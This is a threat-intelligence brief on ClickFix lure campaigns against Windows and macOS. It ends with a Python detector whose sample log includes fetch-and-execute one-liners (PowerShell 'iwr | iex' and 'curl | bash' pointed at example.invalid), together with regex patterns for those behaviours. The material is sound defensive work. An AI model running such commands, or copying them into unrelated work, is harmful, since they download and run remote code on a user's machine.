ClickFix Social Engineering Campaigns Target Windows and macOS, Including Booking.com Users
What Happened — Insikt Group identified five distinct ClickFix clusters that use social‑engineering lures (e.g., fake QuickBooks or Booking.com prompts) to trick victims into running malicious commands via the Windows Run dialog or macOS Terminal. The campaigns have been active since at least May 2024 and adapt to the victim’s operating system to deliver in‑memory, living‑off‑the‑land payloads.
Why It Matters for TPRM —
- Initial‑access techniques bypass traditional endpoint signatures, raising risk for any third party that provides remote workstations or SaaS tools.
- The reusable “template” can be repurposed by multiple threat actors, expanding the attack surface across supply‑chain partners.
- Persistent, fast‑changing infrastructure makes indicator‑based blocking ineffective, demanding behavioral controls at the vendor level.
Who Is Affected — Travel & hospitality (e.g., Booking.com), accounting software providers, real‑estate firms, legal services, and any organization that allows end‑users to run native OS commands.
Recommended Actions —
- Disable the Windows Run dialog via Group Policy Objects (GPO).
- Enforce PowerShell Constrained Language Mode (CLM) on all Windows endpoints.
- Deploy Digital Risk Prevention tools (e.g., Recorded Future Malicious Websites) to block malicious domains.
- Conduct user‑awareness training focused on “run‑dialog” and “terminal” phishing lures.
Technical Notes — The ClickFix technique leverages OS detection to serve platform‑specific commands, executes obfuscated scripts in memory, and relies on legitimate system utilities (Run dialog, Terminal) to evade AV. No specific CVE is cited; the threat is driven by social engineering rather than a software flaw. Source: https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos
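The behavioral detection that the Recommended Actions and Technical Notes above point toward, written here as an added example (not Insikt Group's code or Recorded Future tooling): it flags process-creation events by launch context, a script host spawned by explorer.exe (the Run dialog) or macOS Terminal with hidden-window, policy-bypass, encoded or download-and-execute flags, instead of by domains that churn. The pipe-delimited log format, the field layout and the sample events are constructed for this example.

```python
import re

# Parents that mean "a person typed this": explorer.exe hosts the Windows Run
# dialog; Terminal and iTerm2 are the macOS shells the lure tells the victim to open.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "bash", "zsh", "sh", "osascript"}
# Behaviours rather than indicators: these survive the infrastructure churn the
# report describes, whereas a domain blocklist is stale within days.
BEHAVIOURS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_cmd":   re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_exec": re.compile(
        r"(?:iwr|invoke-webrequest|downloadstring|curl|wget)[^|;]*[|;]\s*"
        r"(?:iex|invoke-expression|bash|sh|zsh)\b", re.I),
}

def basename(path):
    """Last path component, lower-cased, for both Windows and POSIX paths."""
    return re.split(r"[\\/]", path)[-1].lower()

def classify(parent_image, image, command_line):
    """Return the behaviours matched, or [] when the launch context does not fit."""
    if basename(parent_image) not in INTERACTIVE_PARENTS:
        return []  # admin scripts run by services/schedulers share flags, not this parent
    if basename(image) not in SCRIPT_HOSTS:
        return []
    return [name for name, rx in BEHAVIOURS.items() if rx.search(command_line)]

def detect_clickfix(log_text):
    """Parse 'ts|host|parent_image|image|command_line' records and return the hits."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        # maxsplit=4 keeps the pipes inside the command line intact
        ts, host, parent, image, cmd = line.split("|", 4)
        reasons = classify(parent, image, cmd)
        if reasons:
            hits.append({"ts": ts, "host": host, "image": basename(image), "reasons": reasons})
    return hits

# Constructed sample events: one Run-dialog launch, one benign launch, one macOS
# Terminal launch, and one scheduled admin script that must NOT fire.
SAMPLE_LOG = r"""
2024-05-14T10:01:02Z|WS01|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/v | iex"
2024-05-14T10:05:00Z|WS01|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe notes.txt
2024-05-14T10:07:30Z|MAC02|/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal|/bin/bash|bash -c "curl -fsSL https://example.invalid/m | bash"
2024-05-14T10:09:11Z|WS03|C:\Program Files\Vendor\svc.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -ep bypass -File C:\scripts\backup.ps1
"""

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_LOG):
        print(hit)
```

The parent-process gate is what keeps the rule quiet on fleets where legitimate automation also uses `-ep bypass`; feed it Sysmon Event ID 1 or Windows 4688 data (with command-line auditing enabled) and the equivalent macOS endpoint telemetry.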